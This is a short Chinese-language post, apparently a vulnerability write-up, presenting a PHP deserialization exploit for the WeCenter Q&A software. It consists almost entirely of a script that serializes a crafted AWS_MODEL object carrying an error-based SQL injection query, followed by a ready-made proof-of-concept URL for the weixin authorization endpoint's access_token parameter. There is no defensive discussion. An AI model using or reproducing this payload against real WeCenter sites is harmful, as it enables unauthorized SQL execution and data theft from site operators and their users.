wecenter反序列化造成任意SQL语句执行

代码:

<?php
class AWS_MODEL {
    private $_shutdown_query;
    function __construct()
    {
        $this->_shutdown_query = [
            "SELECT updatexml(1,concat(0xa,user()),1)"
        ];
    }
}
$arr = [
    'errcode' => 1,
    new AWS_MODEL()
];
echo urlencode(base64_encode(serialize($arr)));
?>

生成出来的POC:

?/m/weixin/authorization/&state=OAUTH&access_token=YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSx1c2VyKCkpLDEpIjt9fX0%3D


评论回复